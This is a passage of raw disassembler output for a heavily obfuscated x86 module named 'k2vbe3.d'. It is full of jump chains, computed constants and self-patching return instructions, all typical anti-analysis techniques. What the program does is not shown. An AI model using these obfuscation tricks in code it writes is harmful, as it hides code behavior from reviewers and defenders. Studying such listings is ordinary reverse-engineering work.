		cmp	dword ptr [ebp-8], 19h
		jnz	loc_44AA82

loc_447C51:				; CODE XREF: sub_442F64:loc_449B64j
		jmp	loc_455819
sub_447C43	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_241. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45482D

loc_447C57:				; CODE XREF: sub_45482D+6FB7j
		jmp	loc_4480F2
; END OF FUNCTION CHUNK	FOR sub_45482D
; ---------------------------------------------------------------------------

loc_447C5C:				; CODE XREF: k2vbe3.d:00458C83j
		jmp	loc_45AE48
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444297

loc_447C61:				; CODE XREF: sub_444297+7j
		jmp	loc_45A702
; END OF FUNCTION CHUNK	FOR sub_444297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458D4F

loc_447C66:				; CODE XREF: sub_458D4F+Aj
		mov	eax, [esp+0]
		push	edx
		call	sub_44E481
		mov	eax, 0EFFDE014h
		call	sub_451759
		push	edi
		push	0AB642A1Fh
		jmp	loc_45BE12
; END OF FUNCTION CHUNK	FOR sub_458D4F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_150. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45000F

loc_447C85:				; CODE XREF: sub_45000F+6j
		jmp	loc_458777
; END OF FUNCTION CHUNK	FOR sub_45000F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BECA

loc_447C8A:				; CODE XREF: sub_44BECA-93ABj
		jmp	loc_458EC1
; END OF FUNCTION CHUNK	FOR sub_44BECA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_449. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_320. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DA2

loc_447C91:				; CODE XREF: sub_449DA2+FD8Aj
		jmp	loc_441035
; END OF FUNCTION CHUNK	FOR sub_449DA2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_447C96:				; CODE XREF: sub_45101A-8D7Cj
		jmp	loc_44E937
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FFDC

loc_447C9B:				; CODE XREF: sub_43FFDC+Fj
		jmp	loc_4566BD
; END OF FUNCTION CHUNK	FOR sub_43FFDC
; ---------------------------------------------------------------------------

loc_447CA0:				; CODE XREF: k2vbe3.d:0045197Bj
		xchg	ebx, [esp]
		pop	ebx
		xchg	esi, [esp]
		mov	edx, esi
		xchg	ecx, [esp]
		mov	esi, ecx
		jmp	loc_450FAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_447CB3:				; CODE XREF: sub_44A79B+47F7j
		mov	ebx, ecx
		xchg	ebx, [esp+8+var_8]
		mov	esp, ebp
		pop	ebp
		jmp	loc_45231F
; END OF FUNCTION CHUNK	FOR sub_44A79B

; =============== S U B	R O U T	I N E =======================================



sub_447CC0	proc near		; CODE XREF: k2vbe3.d:00441E19p
					; k2vbe3.d:00453CB6j
		xchg	ecx, [esp+0]
		pop	ecx
		lea	eax, nullsub_471
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_471
sub_447CC0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_447CD2:				; CODE XREF: k2vbe3.d:loc_44227Bj
		mov	eax, [esp]
		push	edx
		jmp	loc_44E581
; ---------------------------------------------------------------------------

loc_447CDB:				; CODE XREF: k2vbe3.d:0044EA62j
		not	ebp
		jmp	loc_45203C
; ---------------------------------------------------------------------------

loc_447CE2:				; CODE XREF: k2vbe3.d:0045920Bj
		jnz	loc_44D73C
		jmp	loc_44B58A
; ---------------------------------------------------------------------------

loc_447CED:				; DATA XREF: sub_446E1E:loc_448376o
		mov	al, [eax]
		jnb	loc_44056C
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_442816
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_242. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FDAC

loc_447D04:				; CODE XREF: sub_44FDAC+91E1j
		jmp	nullsub_455
; END OF FUNCTION CHUNK	FOR sub_44FDAC
; ---------------------------------------------------------------------------

loc_447D09:				; CODE XREF: k2vbe3.d:loc_456C6Fj
		jl	loc_44B4A5
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_447D0F:				; CODE XREF: sub_44C90E-7C71j
		jmp	loc_44A716
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		mov	ebx, 9557D05Ch
		or	edx, ecx
		jmp	loc_44B4A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4585F2

loc_447D20:				; CODE XREF: sub_4585F2:loc_44E689j
		mov	[ebp+0], esi
		or	eax, 0EDE0A0E5h
		jmp	loc_454084
; END OF FUNCTION CHUNK	FOR sub_4585F2

; =============== S U B	R O U T	I N E =======================================



sub_447D2E	proc near		; CODE XREF: k2vbe3.d:0044886Dj
					; sub_43D0A9:loc_44B0CEp

; FUNCTION CHUNK AT 0043C43D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447624 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00459B5C SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	ebx
		push	0B94F92EAh
		pop	ebx
		or	ebx, 5EB5E709h

loc_447D3F:				; CODE XREF: k2vbe3.d:0043FB88j
		jmp	loc_43C43D
sub_447D2E	endp

; ---------------------------------------------------------------------------

loc_447D44:				; CODE XREF: k2vbe3.d:0044DBA7j
					; k2vbe3.d:00453F99j
		ja	loc_4400B5
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_447D4A:				; CODE XREF: sub_444D7B:loc_441C3Aj
		sub	eax, 4EF5C65Ch
		add	eax, 4FA1E789h
		push	offset sub_459FFC
		jmp	loc_451063
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_447D60:				; CODE XREF: sub_440C94+3AADj
		jno	loc_44AE12
		sub	al, 99h
		mov	edx, [ebp+var_4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44A89F
		jmp	loc_45B9A1
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------

locret_447D7A:				; CODE XREF: k2vbe3.d:loc_44E411j
		retn
; ---------------------------------------------------------------------------

loc_447D7B:				; CODE XREF: k2vbe3.d:00441811j
		jmp	locret_43F804
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE2A

loc_447D80:				; CODE XREF: sub_43FE2A+Cj
		jmp	loc_446F02
; END OF FUNCTION CHUNK	FOR sub_43FE2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452CF7

loc_447D85:				; CODE XREF: sub_452CF7-1686Bj
		jmp	loc_44E990
; END OF FUNCTION CHUNK	FOR sub_452CF7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_321. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_447D8B	proc near		; CODE XREF: sub_449661-7769p
					; k2vbe3.d:004492E9j
		xchg	edi, [esp+0]
		pop	edi
		mov	byte ptr [eax],	0C3h
		jmp	sub_4440E5
sub_447D8B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449661

loc_447D97:				; CODE XREF: sub_449661+5j
		mov	eax, [esp+4+var_4]
		jmp	loc_454E24
; END OF FUNCTION CHUNK	FOR sub_449661
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454234

loc_447D9F:				; CODE XREF: sub_454234:loc_4563C7j
		mov	ebp, esp
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_444F1C
		or	eax, eax
		jmp	loc_43F7C7
; END OF FUNCTION CHUNK	FOR sub_454234
; ---------------------------------------------------------------------------

locret_447DB1:				; CODE XREF: k2vbe3.d:0044E8A9j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E9D

loc_447DB2:				; CODE XREF: sub_443E9D+125CFj
		jmp	nullsub_288
; END OF FUNCTION CHUNK	FOR sub_443E9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45346B

loc_447DB7:				; CODE XREF: sub_45346B:loc_43CEA0j
		add	ebx, 5B012F1Dh
		xor	ebx, 0A411545Ah
		push	offset sub_45616B
		jmp	nullsub_139
; END OF FUNCTION CHUNK	FOR sub_45346B

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_447DCD	proc near		; CODE XREF: sub_4599AA:loc_44FF01j
		retn
sub_447DCD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F1A6

loc_447DCE:				; CODE XREF: sub_44F1A6+539j
		jmp	loc_45C337
; END OF FUNCTION CHUNK	FOR sub_44F1A6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_403. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_447DD4:				; CODE XREF: sub_44662B+D5DAj
		jmp	nullsub_320
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------

loc_447DD9:				; CODE XREF: k2vbe3.d:0044A16Aj
		jmp	loc_44AFE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_447DDE:				; CODE XREF: sub_44866A+5E9j
		jmp	nullsub_233
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------

loc_447DE3:				; CODE XREF: k2vbe3.d:loc_45B346j
		jz	loc_44270E

loc_447DE9:				; CODE XREF: k2vbe3.d:0045407Fj
		jmp	loc_457486
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E503

loc_447DEE:				; CODE XREF: sub_44E503+Dj
		jmp	loc_458460
; END OF FUNCTION CHUNK	FOR sub_44E503
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_447DF3:				; CODE XREF: sub_43EEC6+3E6Bj
		jmp	loc_43F0E0
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------
		sub	ebx, edx
		xor	ebp, 0D1B2BA68h
		sbb	esi, edi
		jmp	loc_44270E

; =============== S U B	R O U T	I N E =======================================



sub_447E07	proc near		; CODE XREF: sub_44A7C2-85A2p
					; k2vbe3.d:0044BED9j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043CBEF SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043D5F3 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004402A6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044269C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442D64 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00443335 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004438D6 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00443DC2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004447FF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004466FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447F8E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004486F2 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004492CB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449347 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A196 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044F54C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004500FC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004518EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452AEE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455978 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456674 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456AD4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00456D00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457DA0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457F41 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00459FA1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A0CA SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045A880 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0045BD62 SIZE 00000005 BYTES

		xchg	ebx, [esp-4+arg_0]
		pop	ebx
		add	eax, ebp
		add	eax, 116497C6h
		mov	eax, [eax]
		mov	al, [eax]

loc_447E17:				; CODE XREF: k2vbe3.d:loc_43ECE6j
		jmp	loc_457F41
sub_447E07	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448052

loc_447E1C:				; CODE XREF: sub_448052+11j
					; sub_448052+1Fj
		or	edx, ds:4000EAh
		add	edx, 42CEC11Eh
		xor	edx, 49086921h
		call	sub_45B20A
		call	sub_4436CE
		mov	edx, 63180CAFh
		jmp	loc_455371
; END OF FUNCTION CHUNK	FOR sub_448052
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448F78

loc_447E42:				; CODE XREF: sub_448F78+3j
		push	edx
		mov	edx, ecx
		xchg	edx, [esp+4+var_4]
		lea	eax, sub_44B251
		push	offset loc_44557A
		jmp	nullsub_53
; END OF FUNCTION CHUNK	FOR sub_448F78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_447E58:				; CODE XREF: sub_457DCA+1803j
		jz	loc_43F1D8
		jmp	loc_441A5C
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
		ror	ebp, 1Fh
		sub	edx, esi
		jmp	sub_4514E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_447E6D:				; CODE XREF: sub_43CCD0+D713j
		sbb	edx, eax
		jnp	loc_450C34
		jle	loc_43F21A
		jmp	loc_4501F5
; END OF FUNCTION CHUNK	FOR sub_43CCD0

; =============== S U B	R O U T	I N E =======================================



sub_447E80	proc near		; CODE XREF: k2vbe3.d:00447C37p
					; k2vbe3.d:0044EB9Bj
		xchg	edx, [esp+0]
		pop	edx
		mov	eax, [eax]
		pop	ecx
		pop	ebp
		retn	4
sub_447E80	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E542

loc_447E8B:				; CODE XREF: k2vbe3.d:loc_43F519j
					; sub_44E542+1Dj
		jmp	loc_447A47
; END OF FUNCTION CHUNK	FOR sub_44E542

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_447E90	proc near		; CODE XREF: sub_44EB3F+63DBj

; FUNCTION CHUNK AT 0044201F SIZE 0000000D BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_44201F
sub_447E90	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_447E98:				; CODE XREF: sub_4575BD:loc_44DC6Fj
		jnz	loc_44972A
		jmp	loc_440523
; END OF FUNCTION CHUNK	FOR sub_4575BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_447EA3:				; CODE XREF: sub_4426DF+E3D2j
		add	edx, 0D97447Eh
		popf
		xor	eax, edx
		pop	edx
		jb	loc_445EF7
		jmp	loc_459DD7
; END OF FUNCTION CHUNK	FOR sub_4426DF

; =============== S U B	R O U T	I N E =======================================



sub_447EB8	proc near		; DATA XREF: sub_459EB0+7o

; FUNCTION CHUNK AT 00440911 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448BC4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004548AE SIZE 00000017 BYTES

		popf
		pushf
		push	4D1371A0h
		pop	eax
		add	eax, 0E47E74B0h

loc_447EC6:				; CODE XREF: k2vbe3.d:loc_44333Ej
		test	eax, 20000000h
		jmp	loc_448BC4
sub_447EB8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_447ED1:				; CODE XREF: sub_43FE0A+Aj
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	[ebp-0Ch], eax
		xor	eax, eax
		mov	[ebp-8], eax

loc_447EDF:				; CODE XREF: sub_43FE0A:loc_443443j
		jb	loc_43C410
		mov	eax, [ebp-0Ch]
		jmp	loc_43C3F8
; END OF FUNCTION CHUNK	FOR sub_43FE0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2E0

loc_447EED:				; CODE XREF: sub_43F2E0:loc_444837j
		xor	eax, 9FA87A94h
		add	eax, ebp
		add	eax, 0D5828982h
		mov	eax, [eax]
		jmp	loc_45780C
; END OF FUNCTION CHUNK	FOR sub_43F2E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_447F02:				; CODE XREF: sub_44B94B+F785j
		jp	loc_44265D
		sub	edi, 0B39B4219h
		jmp	loc_4465F7
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
		mov	ds:off_41E0B8, eax
		lea	eax, sub_44E00F
		mov	byte ptr [eax],	0C3h
		jmp	sub_44E00F
; ---------------------------------------------------------------------------
		call	nullsub_328
		jmp	ds:dword_41E0BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450E86

loc_447F32:				; CODE XREF: sub_450E86-A9CAj
		jmp	nullsub_106
; END OF FUNCTION CHUNK	FOR sub_450E86
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_325. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_447F38:				; CODE XREF: k2vbe3.d:loc_44D22Bj
					; sub_44B94B+C35Fj
		jmp	loc_45A0D7
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_447F3D:				; CODE XREF: sub_448D7F+DA6Bj
		jmp	loc_4508FF
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45458E

loc_447F42:				; CODE XREF: sub_45458E+Dj
		jmp	sub_456C5F
; END OF FUNCTION CHUNK	FOR sub_45458E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF16

loc_447F47:				; CODE XREF: sub_44DF16:loc_44B203j
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_44DF16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_447F49:				; CODE XREF: sub_442475+16963j
		jmp	loc_4489EF
; END OF FUNCTION CHUNK	FOR sub_442475
; ---------------------------------------------------------------------------

loc_447F4E:				; CODE XREF: k2vbe3.d:0044D646j
		jmp	nullsub_328
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457580

loc_447F53:				; CODE XREF: sub_457580-DEC9j
		push	edi
		push	6BFD8682h
		jmp	loc_442EE4
; END OF FUNCTION CHUNK	FOR sub_457580
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_447F5E:				; CODE XREF: sub_43FF90+11994j
		add	ecx, ebx
; END OF FUNCTION CHUNK	FOR sub_43FF90
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_447F60:				; CODE XREF: sub_43FF90:loc_440B3Ej
					; sub_44DAF6:loc_457793j
		push	0
		push	ecx
		push	918D3BEAh
		pop	ecx
		add	ecx, 2E084A55h
		xor	ecx, 79EDA4D3h
		or	ecx, 0E86B238Ch
		jmp	loc_43E43F
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; ---------------------------------------------------------------------------

loc_447F80:				; CODE XREF: k2vbe3.d:00452BEAj
		rol	edi, 0Eh
		test	edi, 100000h
		jmp	loc_455326
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_447F8E:				; CODE XREF: sub_447E07-403Fj
		jb	loc_4498A1
		mov	esi, ebx
		adc	ebx, 0F4BE8D38h

loc_447F9C:				; CODE XREF: sub_447E07-A800j
					; sub_447E07-35FCj ...
		jmp	loc_459D6D
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------
		jmp	loc_4486F2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_513. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	ds:dword_41E134, eax
		lea	eax, nullsub_526
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_526
; ---------------------------------------------------------------------------
		call	nullsub_7
		jmp	ds:dword_41E138
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4566DA

loc_447FC6:				; CODE XREF: sub_4566DA+Fj
		jmp	nullsub_532
; END OF FUNCTION CHUNK	FOR sub_4566DA
; ---------------------------------------------------------------------------

loc_447FCB:				; CODE XREF: k2vbe3.d:0044403Aj
		jmp	loc_453752
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F364

loc_447FD0:				; CODE XREF: sub_43F364+367Aj
		jmp	sub_445047
; END OF FUNCTION CHUNK	FOR sub_43F364
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_7. PRESS KEYPAD "+" TO EXPAND]
		dw 6A89h
		dd 5AFFFFE8h, 0E924048Bh, 0FFFFE996h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_447FE4:				; CODE XREF: sub_449372+3j
		push	esi
		mov	esi, ecx
		xchg	esi, [esp-0Ch+arg_4]
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_44DA44
		or	eax, eax
		jmp	loc_443860
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
		test	eax, eax
		jz	loc_452576
		jmp	loc_44D674
; ---------------------------------------------------------------------------

loc_448007:				; CODE XREF: k2vbe3.d:00455ABAj
					; k2vbe3.d:loc_45A7E7j
		push	offset loc_45B402
		jmp	loc_43C438
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_326. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444144

loc_448012:				; CODE XREF: sub_444144+16j
		jmp	loc_44D2C4
; END OF FUNCTION CHUNK	FOR sub_444144
; ---------------------------------------------------------------------------

loc_448017:				; DATA XREF: k2vbe3.d:0043D96Co
		mov	[edx], eax
		pop	edx
		lea	eax, nullsub_520
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_520

; =============== S U B	R O U T	I N E =======================================



sub_448028	proc near		; CODE XREF: sub_410B67+14Cp
					; sub_448028+5j
					; DATA XREF: ...
		call	sub_44803D
		jmp	ds:off_41E0A4
sub_448028	endp

; ---------------------------------------------------------------------------

loc_448033:				; CODE XREF: k2vbe3.d:0044A9FAj
		jmp	loc_45B014
; ---------------------------------------------------------------------------

loc_448038:				; CODE XREF: k2vbe3.d:0043C551j
		jmp	loc_44BFA5

; =============== S U B	R O U T	I N E =======================================



sub_44803D	proc near		; CODE XREF: sub_44803D-79D4j
					; sub_448028p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440650 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044AE67 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B433 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044BF87 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		mov	edx, edi
		jmp	loc_44B433
sub_44803D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452092

loc_448047:				; CODE XREF: sub_452092:loc_43DB66j
		jnz	loc_457E5F
		jmp	loc_441836
; END OF FUNCTION CHUNK	FOR sub_452092

; =============== S U B	R O U T	I N E =======================================



sub_448052	proc near		; DATA XREF: k2vbe3.d:loc_44CEBFo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441519 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447E1C SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00455371 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045664A SIZE 00000008 BYTES

		call	sub_4436CE
		push	0A40D927Fh
		pop	edx
		xor	edx, 0DE302AD4h
		jnz	loc_447E1C
		adc	edx, edi
		jnb	loc_448B0C
		jmp	loc_447E1C
sub_448052	endp

; ---------------------------------------------------------------------------

loc_448076:				; CODE XREF: k2vbe3.d:00446A4Bj
		and	esi, ebx
		xor	edx, 9058112Ah

loc_44807E:				; CODE XREF: k2vbe3.d:loc_446A39j
		add	edi, 0CDA5F7ADh
		popf
		xchg	edi, [esp]
		jmp	sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E39D

loc_44808D:				; CODE XREF: sub_44E39D+4j
		push	edi
		push	93B50C07h
		push	offset sub_45B4EE
		jmp	loc_44CAE4
; END OF FUNCTION CHUNK	FOR sub_44E39D

; =============== S U B	R O U T	I N E =======================================



sub_44809D	proc near		; CODE XREF: k2vbe3.d:00455DB4j
					; sub_453347:loc_45AAE1p

; FUNCTION CHUNK AT 004418BE SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00448312 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004549CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004555AE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004555E7 SIZE 00000007 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, [ebp-24h]
		push	0DB834A55h
		jmp	loc_4549CF
sub_44809D	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_516. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4480AF:				; CODE XREF: k2vbe3.d:loc_43DAB3j
		cmp	esi, 17440780h
		jmp	loc_43D9CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_4480BA:				; CODE XREF: sub_4479A1+6j
		xchg	ebx, [esp+0]
		call	sub_4461A0

loc_4480C2:				; CODE XREF: sub_43FF59+647Aj
		jge	loc_454883
		sbb	ecx, esi

loc_4480CA:				; CODE XREF: sub_43FF59:loc_442C50j
		mov	[ebp+var_806], 0
		mov	[ebp+var_805], 0
		mov	[ebp+var_804], 0
		mov	[ebp+var_803], 0
		mov	[ebp+var_802], 0
		jmp	loc_4474D8
; END OF FUNCTION CHUNK	FOR sub_4479A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45482D

loc_4480F2:				; CODE XREF: sub_45482D:loc_447C57j
		jge	loc_4535EC
; END OF FUNCTION CHUNK	FOR sub_45482D
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_4480F8:				; CODE XREF: sub_446E24+8C1Dj
		jmp	loc_45B982
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
		jo	loc_450BD9
		push	ebx
		jmp	loc_4535EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_448109:				; CODE XREF: sub_456C15-1A1BCj
					; k2vbe3.d:00456CB5j
		rol	eax, 1Bh
		push	eax
		call	sub_453347
		retn
; END OF FUNCTION CHUNK	FOR sub_456C15

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_448113	proc near		; CODE XREF: sub_44E0F6+6383p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004449FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446B3A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448B2D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E371 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004512D8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455F16 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456305 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004583EE SIZE 00000011 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		jmp	loc_44E371
sub_448113	endp


; =============== S U B	R O U T	I N E =======================================



sub_44811E	proc near		; DATA XREF: k2vbe3.d:00444382o

; FUNCTION CHUNK AT 0043C602 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004422A1 SIZE 00000020 BYTES

		push	ecx
		push	8BAD83E7h
		pop	ecx
		rol	ecx, 9
		jmp	loc_43C602
sub_44811E	endp

; ---------------------------------------------------------------------------

loc_44812D:				; CODE XREF: k2vbe3.d:00443041j
		mov	ecx, [esi]
		ror	ebx, 12h
		jmp	loc_45690A
; ---------------------------------------------------------------------------
		mov	eax, 0CB10B158h
		call	sub_451759
		push	esi
		push	27F67F23h
		pop	esi
		xor	esi, 0E8F3481Dh
		jmp	loc_44AD8C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_448153:				; CODE XREF: sub_44945C-653Bj
		add	edi, 0D4E0584Ah
